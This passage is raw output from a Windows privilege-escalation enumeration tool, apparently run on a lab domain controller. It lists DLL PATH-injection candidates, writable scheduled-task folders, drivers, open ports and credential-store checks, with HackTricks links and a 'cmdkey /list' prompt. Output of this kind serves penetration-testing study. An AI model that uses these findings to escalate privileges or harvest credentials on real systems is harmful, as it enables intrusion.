    File: kernel32.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: MSCTF
    Folder: None (PATH Injection)
    File: MSCTF.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: MSVCRT
    Folder: None (PATH Injection)
    File: MSVCRT.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: NORMALIZ
    Folder: None (PATH Injection)
    File: NORMALIZ.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: NSI
    Folder: None (PATH Injection)
    File: NSI.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: ole32
    Folder: None (PATH Injection)
    File: ole32.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: OLEAUT32
    Folder: None (PATH Injection)
    File: OLEAUT32.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: PSAPI
    Folder: None (PATH Injection)
    File: PSAPI.DLL
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: rpcrt4
    Folder: None (PATH Injection)
    File: rpcrt4.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: sechost
    Folder: None (PATH Injection)
    File: sechost.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: Setupapi
    Folder: None (PATH Injection)
    File: Setupapi.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: SHCORE
    Folder: None (PATH Injection)
    File: SHCORE.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: SHELL32
    Folder: None (PATH Injection)
    File: SHELL32.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: SHLWAPI
    Folder: None (PATH Injection)
    File: SHLWAPI.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: user32
    Folder: None (PATH Injection)
    File: user32.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: WLDAP32
    Folder: None (PATH Injection)
    File: WLDAP32.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: wow64
    Folder: None (PATH Injection)
    File: wow64.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: wow64win
    Folder: None (PATH Injection)
    File: wow64win.dll
   =================================================================================================

    RegPath: HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDlls
    Key: WS2_32
    Folder: None (PATH Injection)
    File: WS2_32.dll
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Active Setup\\Installed Components\\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}
    Key: StubPath
    Folder: \\
    FolderPerms: Users [Allow: AppendData/CreateDirectories]
    File: /UserInstall
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Active Setup\\Installed Components\\{6BF52A52-394A-11d3-B153-00C04F79FAA6}
    Key: StubPath
    Folder: C:\\Windows\\system32
    File: C:\\Windows\\system32\\unregmp2.exe /FirstLogon
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11cf-8B85-00AA005B4340}
    Key: StubPath
    Folder: None (PATH Injection)
    File: U
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11cf-8B85-00AA005B4383}
    Key: StubPath
    Folder: C:\\Windows\\System32
    File: C:\\Windows\\System32\\ie4uinit.exe -UserConfig
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Active Setup\\Installed Components\\{89B4C1CD-B018-4511-B0A1-5476DBF70820}
    Key: StubPath
    Folder: C:\\Windows\\System32
    File: C:\\Windows\\System32\\Rundll32.exe C:\\Windows\\System32\\mscories.dll,Install
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Active Setup\\Installed Components\\{A509B1A7-37EF-4b3f-8CFC-4F3A74704073}
    Key: StubPath
    Folder: C:\\Windows\\System32
    File: C:\\Windows\\System32\\rundll32.exe C:\\Windows\\System32\\iesetup.dll,IEHardenAdmin
   =================================================================================================

    RegPath: HKLM\\Software\\Microsoft\\Active Setup\\Installed Components\\{A509B1A8-37EF-4b3f-8CFC-4F3A74704073}
    Key: StubPath
    Folder: C:\\Windows\\System32
    File: C:\\Windows\\System32\\rundll32.exe C:\\Windows\\System32\\iesetup.dll,IEHardenUser
   =================================================================================================

    RegPath: HKLM\\Software\\Wow6432Node\\Microsoft\\Active Setup\\Installed Components\\{6BF52A52-394A-11d3-B153-00C04F79FAA6}
    Key: StubPath
    Folder: C:\\Windows\\system32
    File: C:\\Windows\\system32\\unregmp2.exe /FirstLogon
   =================================================================================================

    RegPath: HKLM\\Software\\Wow6432Node\\Microsoft\\Active Setup\\Installed Components\\{89B4C1CD-B018-4511-B0A1-5476DBF70820}
    Key: StubPath
    Folder: C:\\Windows\\SysWOW64
    File: C:\\Windows\\SysWOW64\\Rundll32.exe C:\\Windows\\SysWOW64\\mscories.dll,Install
   =================================================================================================

    RegPath: HKLM\\Software\\Wow6432Node\\Microsoft\\Active Setup\\Installed Components\\{A509B1A7-37EF-4b3f-8CFC-4F3A74704073}
    Key: StubPath
    Folder: C:\\Windows\\SysWOW64
    File: C:\\Windows\\SysWOW64\\rundll32.exe C:\\Windows\\SysWOW64\\iesetup.dll,IEHardenAdmin
   =================================================================================================

    RegPath: HKLM\\Software\\Wow6432Node\\Microsoft\\Active Setup\\Installed Components\\{A509B1A8-37EF-4b3f-8CFC-4F3A74704073}
    Key: StubPath
    Folder: C:\\Windows\\SysWOW64
    File: C:\\Windows\\SysWOW64\\rundll32.exe C:\\Windows\\SysWOW64\\iesetup.dll,IEHardenUser
   =================================================================================================

    Folder: C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup
    File: C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini
    Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\\system32\\shell32.dll,-21787
   =================================================================================================

    Folder: C:\\windows\\tasks
    FolderPerms: Authenticated Users [Allow: WriteData/CreateFiles]
   =================================================================================================

    Folder: C:\\windows\\system32\\tasks
    FolderPerms: Authenticated Users [Allow: WriteData/CreateFiles]
   =================================================================================================

    Folder: C:\\windows
    File: C:\\windows\\system.ini
   =================================================================================================

    Folder: C:\\windows
    File: C:\\windows\\win.ini
   =================================================================================================

ÉÍÍÍÍÍÍÍÍÍÍ¹ Scheduled Applications --Non Microsoft--
È Check if you can modify other users scheduled binaries <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html>                                                                                                                             

ÉÍÍÍÍÍÍÍÍÍÍ¹ Device Drivers --Non Microsoft--
È Check 3rd party drivers for known vulnerabilities/rootkits. <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#drivers>                                                                                                                                                     
    QLogic Gigabit Ethernet - 7.12.31.105 [QLogic Corporation]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\bxvbda.sys
    QLogic 10 GigE - 7.13.65.105 [QLogic Corporation]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\evbda.sys
    QLogic FastLinQ Ethernet - 8.33.20.103 [Cavium, Inc.]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\qevbda.sys
    NVIDIA nForce(TM) RAID Driver - 10.6.0.23 [NVIDIA Corporation]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\nvraid.sys
    VMware vSockets Service - 9.8.16.0 build-14168184 [VMware, Inc.]: \\\\.\\GLOBALROOT\\SystemRoot\\system32\\DRIVERS\\vsock.sys
    VMware PCI VMCI Bus Device - 9.8.16.0 build-14168184 [VMware, Inc.]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\vmci.sys
    Intel Matrix Storage Manager driver - 8.6.2.1019 [Intel Corporation]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\iaStorV.sys
     Promiser SuperTrak EX Series -  5.1.0000.10 [Promise Technology, Inc.]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\stexstor.sys
    LSI 3ware RAID Controller - WindowsBlue [LSI]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\3ware.sys
    AHCI 1.3 Device Driver - 1.1.3.277 [Advanced Micro Devices]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\amdsata.sys
    Storage Filter Driver - 1.1.3.277 [Advanced Micro Devices]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\amdxata.sys
    AMD Technology AHCI Compatible Controller - 3.7.1540.43 [AMD Technologies Inc.]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\amdsbs.sys
    Adaptec RAID Controller - 7.5.0.32048 [PMC-Sierra, Inc.]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\arcsas.sys
    Windows (R) Win 7 DDK driver - 10.0.10011.16384 [Avago Technologies]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\ItSas35i.sys
    LSI Fusion-MPT SAS Driver (StorPort) - 1.34.03.83 [LSI Corporation]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\lsi_sas.sys
    Windows (R) Win 7 DDK driver - 10.0.10011.16384 [LSI Corporation]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\lsi_sas2i.sys
    Windows (R) Win 7 DDK driver - 10.0.10011.16384 [Avago Technologies]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\lsi_sas3i.sys
    LSI SSS PCIe/Flash Driver (StorPort) - 2.10.61.81 [LSI Corporation]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\lsi_sss.sys
    MEGASAS RAID Controller Driver for Windows - 6.706.06.00 [Avago Technologies]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\megasas.sys
    MEGASAS RAID Controller Driver for Windows - 6.714.05.00 [Avago Technologies]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\MegaSas2i.sys
    MEGASAS RAID Controller Driver for Windows - 7.705.08.00 [Avago Technologies]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\megasas35i.sys
    MegaRAID Software RAID - 15.02.2013.0129 [LSI Corporation, Inc.]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\megasr.sys
    Marvell Flash Controller -  1.0.5.1016  [Marvell Semiconductor, Inc.]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\mvumis.sys
    NVIDIA nForce(TM) SATA Driver - 10.6.0.23 [NVIDIA Corporation]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\nvstor.sys
    MEGASAS RAID Controller Driver for Windows - 6.805.03.00 [Avago Technologies]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\percsas2i.sys
    MEGASAS RAID Controller Driver for Windows - 6.604.06.00 [Avago Technologies]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\percsas3i.sys
    Microsoftr Windowsr Operating System - 2.60.01 [Silicon Integrated Systems Corp.]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\SiSRaid2.sys
    Microsoftr Windowsr Operating System - 6.1.6918.0 [Silicon Integrated Systems]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\sisraid4.sys
    VIA RAID driver - 7.0.9600,6352 [VIA Technologies Inc.,Ltd]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\vsmraid.sys
    VIA StorX RAID Controller Driver - 8.0.9200.8110 [VIA Corporation]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\vstxraid.sys
    Chelsio Communications iSCSI Controller - 10.0.10011.16384 [Chelsio Communications]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\cht4sx64.sys
    Intel(R) Rapid Storage Technology driver (inbox) - 15.44.0.1010 [Intel Corporation]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\iaStorAVC.sys
    QLogic BR-series FC/FCoE HBA Stor Miniport Driver - 3.2.26.1 [QLogic Corporation]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\bfadfcoei.sys
    Emulex WS2K12 Storport Miniport Driver x64 - 11.0.247.8000 01/26/2016 WS2K12 64 bit x64 [Emulex]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\elxfcoe.sys
    Emulex WS2K12 Storport Miniport Driver x64 - 11.4.225.8009 11/15/2017 WS2K12 64 bit x64 [Broadcom]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\elxstor.sys                                                                                                                                                            
    QLogic iSCSI offload driver - 8.33.5.2 [QLogic Corporation]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\qeois.sys
    QLogic Fibre Channel Stor Miniport Driver - 9.1.15.1 [QLogic Corporation]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\ql2300i.sys
    QLA40XX iSCSI Host Bus Adapter - 2.1.5.0 (STOREx wx64) [QLogic Corporation]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\ql40xx2i.sys
    QLogic FCoE Stor Miniport Inbox Driver - 9.1.11.3 [QLogic Corporation]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\qlfcoei.sys
    PMC-Sierra HBA Controller - 1.3.0.10769 [PMC-Sierra]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\ADP80XX.SYS
    QLogic BR-series FC/FCoE HBA Stor Miniport Driver - 3.2.26.1 [QLogic Corporation]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\bfadi.sys
    Smart Array SAS/SATA Controller Media Driver - 8.0.4.0 Build 1 Media Driver (x86-64) [Hewlett-Packard Company]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\HpSAMD.sys                                                                                                                                                 
    SmartRAID, SmartHBA PQI Storport Driver - 1.50.0.0 [Microsemi Corportation]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\SmartSAMD.sys
    QLogic FCoE offload driver - 8.33.4.2 [Cavium, Inc.]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\qefcoe.sys
    QLogic iSCSI offload driver - 7.14.7.2 [QLogic Corporation]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\bxois.sys
    QLogic FCoE Offload driver - 7.14.15.2 [QLogic Corporation]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\bxfcoe.sys
    VMware Pointing PS/2 Device Driver - 12.5.10.0 build-14169150 [VMware, Inc.]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\vmmouse.sys
    VMware SVGA 3D - 8.16.07.0008 - build-16233244 [VMware, Inc.]: \\\\.\\GLOBALROOT\\SystemRoot\\system32\\DRIVERS\\vm3dmp_loader.sys
    VMware SVGA 3D - 8.16.07.0008 - build-16233244 [VMware, Inc.]: \\\\.\\GLOBALROOT\\SystemRoot\\system32\\DRIVERS\\vm3dmp.sys
    VMware PCIe Ethernet Adapter NDIS 6.30 (64-bit) - 1.8.16.0 build-14217867 [VMware, Inc.]: \\\\.\\GLOBALROOT\\SystemRoot\\System32\\drivers\\vmxnet3.sys
    VMware server memory controller - 7.5.5.0 build-14903665 [VMware, Inc.]: \\\\.\\GLOBALROOT\\SystemRoot\\system32\\DRIVERS\\vmmemctl.sys

ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Network Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

ÉÍÍÍÍÍÍÍÍÍÍ¹ Network Shares
  [X] Exception: Access denied 

ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerate Network Mapped Drives (WMI)

ÉÍÍÍÍÍÍÍÍÍÍ¹ Host File

ÉÍÍÍÍÍÍÍÍÍÍ¹ Network Ifaces and known hosts
È The masks are only for the IPv4 addresses 
    Ethernet0 2[00:50:56:B0:F8:FA]: 10.129.95.180, fe80::6ccd:d962:a380:3da6%7, dead:beef::6ccd:d962:a380:3da6, dead:beef::ca / 255.255.0.0
        Gateways: 10.129.0.1, fe80::250:56ff:feb9:2bb5%7
        DNSs: 1.1.1.1, 8.8.8.8
        Known hosts:
          10.129.0.1            00-50-56-B9-2B-B5     Dynamic
          10.129.255.255        FF-FF-FF-FF-FF-FF     Static
          169.254.255.255       00-00-00-00-00-00     Invalid
          224.0.0.22            01-00-5E-00-00-16     Static
          224.0.0.251           01-00-5E-00-00-FB     Static
          224.0.0.252           01-00-5E-00-00-FC     Static
          255.255.255.255       FF-FF-FF-FF-FF-FF     Static

    Loopback Pseudo-Interface 1[]: 127.0.0.1, ::1 / 255.0.0.0
        DNSs: fec0:0:0:ffff::1%1, fec0:0:0:ffff::2%1, fec0:0:0:ffff::3%1
        Known hosts:
          224.0.0.22            00-00-00-00-00-00     Static

ÉÍÍÍÍÍÍÍÍÍÍ¹ Current TCP Listening Ports
È Check for services restricted from the outside 
  Enumerating IPv4 connections
                                                                                                                                                             
  Protocol   Local Address         Local Port    Remote Address        Remote Port     State             Process ID      Process Name

  TCP        0.0.0.0               80            0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               88            0.0.0.0               0               Listening         636             lsass
  TCP        0.0.0.0               135           0.0.0.0               0               Listening         888             svchost
  TCP        0.0.0.0               389           0.0.0.0               0               Listening         636             lsass
  TCP        0.0.0.0               445           0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               464           0.0.0.0               0               Listening         636             lsass
  TCP        0.0.0.0               593           0.0.0.0               0               Listening         888             svchost
  TCP        0.0.0.0               636           0.0.0.0               0               Listening         636             lsass
  TCP        0.0.0.0               3268          0.0.0.0               0               Listening         636             lsass
  TCP        0.0.0.0               3269          0.0.0.0               0               Listening         636             lsass
  TCP        0.0.0.0               5985          0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               9389          0.0.0.0               0               Listening         3060            Microsoft.ActiveDirectory.WebServices
  TCP        0.0.0.0               47001         0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               49664         0.0.0.0               0               Listening         484             wininit
  TCP        0.0.0.0               49665         0.0.0.0               0               Listening         1192            svchost
  TCP        0.0.0.0               49666         0.0.0.0               0               Listening         1676            svchost
  TCP        0.0.0.0               49667         0.0.0.0               0               Listening         636             lsass
  TCP        0.0.0.0               49673         0.0.0.0               0               Listening         636             lsass
  TCP        0.0.0.0               49674         0.0.0.0               0               Listening         636             lsass
  TCP        0.0.0.0               49676         0.0.0.0               0               Listening         2940            spoolsv
  TCP        0.0.0.0               49685         0.0.0.0               0               Listening         2296            dns
  TCP        0.0.0.0               49692         0.0.0.0               0               Listening         2228            dfsrs
  TCP        0.0.0.0               49704         0.0.0.0               0               Listening         624             services
  TCP        10.129.95.180         53            0.0.0.0               0               Listening         2296            dns
  TCP        10.129.95.180         139           0.0.0.0               0               Listening         4               System

  Enumerating IPv6 connections
                                                                                                                                                             
  Protocol   Local Address                               Local Port    Remote Address                              Remote Port     State             Process ID      Process Name

  TCP        [::]                                        80            [::]                                        0               Listening         4               System
  TCP        [::]                                        88            [::]                                        0               Listening         636             lsass
  TCP        [::]                                        135           [::]                                        0               Listening         888             svchost
  TCP        [::]                                        389           [::]                                        0               Listening         636             lsass
  TCP        [::]                                        445           [::]                                        0               Listening         4               System
  TCP        [::]                                        464           [::]                                        0               Listening         636             lsass
  TCP        [::]                                        593           [::]                                        0               Listening         888             svchost
  TCP        [::]                                        636           [::]                                        0               Listening         636             lsass
  TCP        [::]                                        3268          [::]                                        0               Listening         636             lsass
  TCP        [::]                                        3269          [::]                                        0               Listening         636             lsass
  TCP        [::]                                        5985          [::]                                        0               Listening         4               System
  TCP        [::]                                        9389          [::]                                        0               Listening         3060            Microsoft.ActiveDirectory.WebServices
  TCP        [::]                                        47001         [::]                                        0               Listening         4               System
  TCP        [::]                                        49664         [::]                                        0               Listening         484             wininit
  TCP        [::]                                        49665         [::]                                        0               Listening         1192            svchost
  TCP        [::]                                        49666         [::]                                        0               Listening         1676            svchost
  TCP        [::]                                        49667         [::]                                        0               Listening         636             lsass
  TCP        [::]                                        49673         [::]                                        0               Listening         636             lsass
  TCP        [::]                                        49674         [::]                                        0               Listening         636             lsass
  TCP        [::]                                        49676         [::]                                        0               Listening         2940            spoolsv
  TCP        [::]                                        49685         [::]                                        0               Listening         2296            dns
  TCP        [::]                                        49692         [::]                                        0               Listening         2228            dfsrs
  TCP        [::]                                        49704         [::]                                        0               Listening         624             services
  TCP        [::1]                                       53            [::]                                        0               Listening         2296            dns
  TCP        [::1]                                       389           [::1]                                       49677           Established       636             lsass
  TCP        [::1]                                       389           [::1]                                       49678           Established       636             lsass
  TCP        [::1]                                       389           [::1]                                       49683           Established       636             lsass
  TCP        [::1]                                       49677         [::1]                                       389             Established       2444            ismserv
  TCP        [::1]                                       49678         [::1]                                       389             Established       2444            ismserv
  TCP        [::1]                                       49683         [::1]                                       389             Established       2296            dns
  TCP        [dead:beef::ca]                             53            [::]                                        0               Listening         2296            dns
  TCP        [dead:beef::6ccd:d962:a380:3da6]            53            [::]                                        0               Listening         2296            dns
  TCP        [fe80::6ccd:d962:a380:3da6%7]               53            [::]                                        0               Listening         2296            dns
  TCP        [fe80::6ccd:d962:a380:3da6%7]               389           [fe80::6ccd:d962:a380:3da6%7]               49679           Established       636             lsass
  TCP        [fe80::6ccd:d962:a380:3da6%7]               389           [fe80::6ccd:d962:a380:3da6%7]               49684           Established       636             lsass
  TCP        [fe80::6ccd:d962:a380:3da6%7]               389           [fe80::6ccd:d962:a380:3da6%7]               49688           Established       636             lsass
  TCP        [fe80::6ccd:d962:a380:3da6%7]               49674         [fe80::6ccd:d962:a380:3da6%7]               49687           Established       636             lsass
  TCP        [fe80::6ccd:d962:a380:3da6%7]               49674         [fe80::6ccd:d962:a380:3da6%7]               49745           Established       636             lsass
  TCP        [fe80::6ccd:d962:a380:3da6%7]               49679         [fe80::6ccd:d962:a380:3da6%7]               389             Established       2228            dfsrs
  TCP        [fe80::6ccd:d962:a380:3da6%7]               49684         [fe80::6ccd:d962:a380:3da6%7]               389             Established       2296            dns
  TCP        [fe80::6ccd:d962:a380:3da6%7]               49687         [fe80::6ccd:d962:a380:3da6%7]               49674           Established       2228            dfsrs
  TCP        [fe80::6ccd:d962:a380:3da6%7]               49688         [fe80::6ccd:d962:a380:3da6%7]               389             Established       2228            dfsrs
  TCP        [fe80::6ccd:d962:a380:3da6%7]               49745         [fe80::6ccd:d962:a380:3da6%7]               49674           Established       636             lsass

ÉÍÍÍÍÍÍÍÍÍÍ¹ Current UDP Listening Ports
È Check for services restricted from the outside 
  Enumerating IPv4 connections
                                                                                                                                                             
  Protocol   Local Address         Local Port    Remote Address:Remote Port     Process ID        Process Name

  UDP        0.0.0.0               123           *:*                            1044              svchost
  UDP        0.0.0.0               389           *:*                            636               lsass
  UDP        0.0.0.0               5353          *:*                            1132              svchost
  UDP        0.0.0.0               5355          *:*                            1132              svchost
  UDP        0.0.0.0               55476         *:*                            1132              svchost
  UDP        0.0.0.0               60970         *:*                            1132              svchost
  UDP        10.129.95.180         88            *:*                            636               lsass
  UDP        10.129.95.180         137           *:*                            4                 System
  UDP        10.129.95.180         138           *:*                            4                 System
  UDP        10.129.95.180         464           *:*                            636               lsass
  UDP        127.0.0.1             50838         *:*                            2188              svchost
  UDP        127.0.0.1             56390         *:*                            2444              ismserv
  UDP        127.0.0.1             60550         *:*                            636               lsass
  UDP        127.0.0.1             60551         *:*                            1468              svchost
  UDP        127.0.0.1             60662         *:*                            2228              dfsrs
  UDP        127.0.0.1             60663         *:*                            3060              Microsoft.ActiveDirectory.WebServices
  UDP        127.0.0.1             60842         *:*                            3656              WmiPrvSE
  UDP        127.0.0.1             61713         *:*                            1408              svchost

  Enumerating IPv6 connections
                                                                                                                                                             
  Protocol   Local Address                               Local Port    Remote Address:Remote Port     Process ID        Process Name

  UDP        [::]                                        123           *:*                            1044              svchost
  UDP        [::]                                        389           *:*                            636               lsass
  UDP        [::]                                        5353          *:*                            1132              svchost
  UDP        [::]                                        5355          *:*                            1132              svchost
  UDP        [::]                                        55476         *:*                            1132              svchost
  UDP        [::]                                        60970         *:*                            1132              svchost
  UDP        [dead:beef::ca]                             88            *:*                            636               lsass
  UDP        [dead:beef::ca]                             464           *:*                            636               lsass
  UDP        [dead:beef::6ccd:d962:a380:3da6]            88            *:*                            636               lsass
  UDP        [dead:beef::6ccd:d962:a380:3da6]            464           *:*                            636               lsass
  UDP        [fe80::6ccd:d962:a380:3da6%7]               88            *:*                            636               lsass
  UDP        [fe80::6ccd:d962:a380:3da6%7]               464           *:*                            636               lsass

ÉÍÍÍÍÍÍÍÍÍÍ¹ Firewall Rules
È Showing only DENY rules (too many ALLOW rules always) 
    Current Profiles: DOMAIN
    FirewallEnabled (Domain):    True
    FirewallEnabled (Private):    True
    FirewallEnabled (Public):    True
    DENY rules:

ÉÍÍÍÍÍÍÍÍÍÍ¹ DNS cached --limit 70--
    Entry                                 Name                                  Data
  [X] Exception: Access denied 

ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Internet settings, zone and proxy configuration
  General Settings
  Hive        Key                                       Value
  HKCU        DisableCachingOfSSLPages                  0
  HKCU        IE5_UA_Backup_Flag                        5.0
  HKCU        PrivacyAdvanced                           1
  HKCU        SecureProtocols                           2688
  HKCU        User Agent                                Mozilla/4.0 (compatible; MSIE 8.0; Win32)
  HKCU        CertificateRevocation                     1
  HKCU        ZonesSecurityUpgrade                      System.Byte[]
  HKLM        ActiveXCache                              C:\\Windows\\Downloaded Program Files
  HKLM        CodeBaseSearchPath                        CODEBASE
  HKLM        EnablePunycode                            1
  HKLM        MinorVersion                              0
  HKLM        WarnOnIntranet                            1

  Zone Maps                                                                                                                                                  
  No URLs configured

  Zone Auth Settings                                                                                                                                         
  No Zone Auth Settings

ÉÍÍÍÍÍÍÍÍÍÍ¹ Internet Connectivity
È Checking if internet access is possible via different methods 
    HTTP (80) Access: Not Accessible
  [X] Exception:       Error: A task was canceled.
    HTTPS (443) Access: Not Accessible
  [X] Exception:       Error: TCP connect timed out
    HTTPS (443) Access by Domain Name: Not Accessible
  [X] Exception:       Error: A task was canceled.
    DNS (53) Access: Not Accessible
  [X] Exception:       Error: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond                                                                                                      
    ICMP (ping) Access: Not Accessible
  [X] Exception:       Error: Ping failed: TimedOut

ÉÍÍÍÍÍÍÍÍÍÍ¹ Hostname Resolution
È Checking if the hostname can be resolved externally 
  [X] Exception:     Error during hostname check: An error occurred while sending the request.

ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Cloud Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
Learn and practice cloud hacking in training.hacktricks.xyz
AWS EC2?                                No
Azure VM?                               No
Azure Tokens?                           No
Google Cloud Platform?                  No
Google Workspace Joined?                No
Google Cloud Directory Sync?            No
Google Password Sync?                   No

ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Windows Credentials ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking Windows Vault
È  <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#credentials-manager--windows-vault>
  [ERROR] Unable to enumerate vaults. Error (0x1061)
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking Credential manager
È  <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#credentials-manager--windows-vault>
    [!] Warning: if password contains non-printable characters, it will be printed as unicode base64 encoded string

  [!] Unable to enumerate credentials automatically, error: 'Win32Exception: System.ComponentModel.Win32Exception (0x80004005): A specified logon session does not exist. It may already have been terminated'
Please run:
cmdkey /list

ÉÍÍÍÍÍÍÍÍÍÍ¹ Saved RDP connections
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Remote Desktop Server/Client Settings
  RDP Server Settings
    Network Level Authentication            :
    Block Clipboard Redirection             :
    Block COM Port Redirection              :
    Block Drive Redirection                 :
    Block LPT Port Redirection              :
    Block PnP Device Redirection            :
    Block Printer Redirection               :
    Allow Smart Card Redirection            :

  RDP Client Settings                                                                                                                                        
    Disable Password Saving                 :       True
    Restricted Remote Administration        :       False

